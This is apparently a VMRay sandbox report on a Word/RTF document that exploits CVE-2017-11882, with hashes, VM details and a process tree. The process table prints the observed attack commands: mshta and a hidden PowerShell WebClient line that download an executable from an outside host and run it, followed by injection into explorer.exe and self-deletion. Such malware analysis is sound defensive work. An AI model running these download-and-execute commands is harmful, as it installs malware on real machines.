RTF Document Takes Advantage of CVE-2017-11882 Vulnerability | VMRay Analyzer Report

RTF Document Takes Advantage of CVE-2017-11882 Vulnerability | VMRay Analyzer Report

Try VMRay Analyzer

Analysis Information

Creation Time	2017-12-20 15:26 (UTC+1)
VM Analysis Duration Time	00:02:20
Execution Successful
Sample Filename	WhitePaper.doc
Command Line Parameters
Prescript
Number of Processes	9
Termination Reason	Timeout
Reputation Enabled
Download	Archive Function Logfile Generic Logfile PCAP STIX/CybOX XML Summary JSON

VTI Information

VTI Score 100 / 100
VTI Database Version	2.6
VTI Rule Match Count	36
VTI Rule Type	Documents

Tags

#CVE #Malware

Remarks

	The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.
	The maximum number of dumps was reached during the analysis. Some memory dumps may be missing in the reports. You can increase the limit in the configuration.

Screenshots

Screenshot

Screenshot

Screenshot

Screenshot

Screenshot

Screenshot

Screenshot

Screenshot

Screenshot

Screenshot

Monitored Processes

Process Graph

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x95c	Analysis Target	Medium	winword.exe	"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"	-
#2	0x9f4	RPC Server	Medium	eqnedt32.exe	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding	#1
#3	0xa18	Child Process	Medium	mshta.exe	mShta http://doc2th.com/tin/foobaz.txt &AAAAC	#2
#5	0xb44	Child Process	Medium	powershell.exe	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://doc2th.com/tin/off.exe', 'C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe');C:\Users\BGC6U8~1\AppData\Local\Temp/lambdoidtegument.exe	#3
#6	0xb84	Child Process	Medium	lambdoidtegument.exe	"C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"	#5
#7	0x610	Injection	Medium	explorer.exe	C:\Windows\Explorer.EXE	#6
#8	0xbd4	Child Process	Medium	cmmon32.exe	"C:\Windows\System32\cmmon32.exe"	#7
#9	0xc80	Child Process	Medium	cmd.exe	/c del "C:\Users\BGC6U8~1\AppData\Local\Temp\lambdoidtegument.exe"	#8
#11	0xce4	Child Process	Medium	firefox.exe	"C:\Program Files\Mozilla Firefox\Firefox.exe"	#8

Sample Information

ID	#20883
MD5 Hash Value	30926dda00ebf82f1355217d4285980f
SHA1 Hash Value	d1b8a2414232fbeb997dcb4fdc1d9969137a5445
SHA256 Hash Value	1c0a1a7c695d5e1a7497b7fa4f75cf83f12265eaca2297b3d72461d110fcb079
Filename	WhitePaper.doc
File Size	8.48 KB (8685 bytes)
File Type	Word Document
Has VBA Macros

Analyzer and Virtual Machine Information

Analyzer Version	2.2.0
Analyzer Build Date	2017-12-15 17:49
Microsoft Office Version	2013
Microsoft Word Version	15.0.4569.1504
Internet Explorer Version	8.0.7601.17514
Chrome Version	58.0.3029.110
Firefox Version	25.0
Flash Version	10.3.183.90
Java Version	7.0.600
VM Name	win7_32_sp1-mso2013
VM Architecture	x86 32-bit PAE
VM OS	Windows 7
VM Kernel Version	6.1.7601.17514 (684da42a-30cc-450f-81c5-35b4d18944b1)

Function Logfile

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".

Screenshot